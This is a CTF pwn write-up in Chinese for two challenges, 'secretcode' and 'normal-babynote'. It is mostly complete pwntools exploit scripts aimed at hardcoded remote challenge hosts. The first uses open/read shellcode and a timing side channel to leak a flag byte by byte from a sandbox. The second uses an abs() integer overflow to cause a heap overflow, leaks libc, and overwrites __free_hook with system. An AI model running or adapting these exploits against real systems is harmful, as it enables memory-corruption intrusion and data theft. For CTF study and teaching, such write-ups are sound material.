secretcode

去年决赛、今年线上初赛题目、今年决赛还是这题,一题 3 次

考点还是那样 open read 通过延时爆破 flag ,这次沙箱就多了个规则需要 fd 大于 0x14 才能调用 read ,多写一个 while 循环的事情

由于多了 while 循环 flag 位置变了一下,直接从第二个字符开始爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# encoding=utf-8
from pwn import *

file_path = "./chall"
context.arch = "amd64"
# context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 0
# if debug:
# p = process([file_path])
# gdb.attach(p, "b *$rebase(0xC94)")
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# one_gadget = 0x0
#
# else:
# p = remote('', 0)
# libc = ELF('')
# one_gadget = 0x0


def pwn(p, index, ch):

# open
# shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; xor esi, esi; pop rax; syscall;"
shellcode = '''push 0x10034aaa;pop rdi;shr edi, 12;xor esi, esi;push 2;pop rax;syscall;'''

shellcode += "add r15,1;cmp r15 , 0x14; jle $-24;"

# read(rax, 0x10040, 0x50)
# shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

# cmp and jz
if index == 0:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
else:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

shellcode = asm(shellcode)

# p.sendlineafter("execution-box.\n", read_next.ljust(0x30))

p.sendafter("\n", shellcode.ljust(0x40 - 14, b'a') + b'./flag')


index = 1
ans = []
while True:
for ch in range(0x20, 127):
if debug:
p = process([file_path])
else:
# p = remote('8.131.246.36', 40334)
p = remote("47.104.169.149",25178)
pwn(p, index, ch)
start = time.time()
try:
p.recv(timeout=2)
except:
pass
end = time.time()
p.close()
if end - start > 1.5:
ans.append(ch)
print("".join([chr(i) for i in ans]))
break
else:
print("".join([chr(i) for i in ans]))
break
index = index + 1
print(ans)

print("".join([chr(i) for i in ans]))

normal-babynote

abs函数接收4字节有符号int数,当传入0x80000000时,其返回结果仍然是0x80000000,int正数将无法表示这么大,因此,其值是一个负数,造成堆溢出,可以修改自身的 size 位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']


def add(size,content):
p.sendlineafter("> ",str(1))
p.sendlineafter("> ",str(size))
p.sendafter("> ",content)
def edit(id,offset,content):
p.sendlineafter("> ",str(2))
p.sendlineafter("> ",str(id))
p.sendlineafter("> ",str(offset))
p.sendafter("> ",content)
def delete(id):
p.sendlineafter("> ",str(3))
p.sendlineafter("> ",str(id))
def show(id):
p.sendlineafter("> ",str(4))
p.sendlineafter("> ",str(id))


p = process("./chall")
p = remote("47.104.169.149",14269)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

add(0xf8,'\n')#0
add(0x220,'\n')#1
add(0x100,'\n')#2
add(0x18,'/bin/sh\x00\n')

payload = 'a'*48
payload += p64(0x200)+p64(0x441) + '\n'
edit(0,0x80000000,payload)

delete(0)
add(0xf8,'\n')#0
show(1)
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(leak_addr)
libc_base = leak_addr-(0x7ffff7dcdca0-0x7ffff79e2000)
print hex(libc_base)
free_hook = libc_base+libc.symbols['__free_hook']
print "free_hook:",hex(free_hook)
system_addr = libc_base + libc.sym['system']
print system_addr

add(0x220,'\n')#1
delete(1)
edit(5,0,p64(free_hook)+'\n')
add(0x220,'\n')#1
add(0x220,'ls;\x00\n')#1

edit(7,0,p64(system_addr)+'\n')

# gdb.attach(p,"*$rebase(0xd1A)")
# raw_input()


delete(3)

'''
for i in range(10):
add(0xf8,'\n')
for i in range(3,10):
delete(i)
delete(0)

edit(2,0x80000000,payload)
delete(2)

for i in range(5):
add(0xf8,'\n')
'''



# edit(1,0x80000000,'a'*0x200+'\n')


# edit(0,0x80000000,'a'*0x18+'\n')










p.interactive()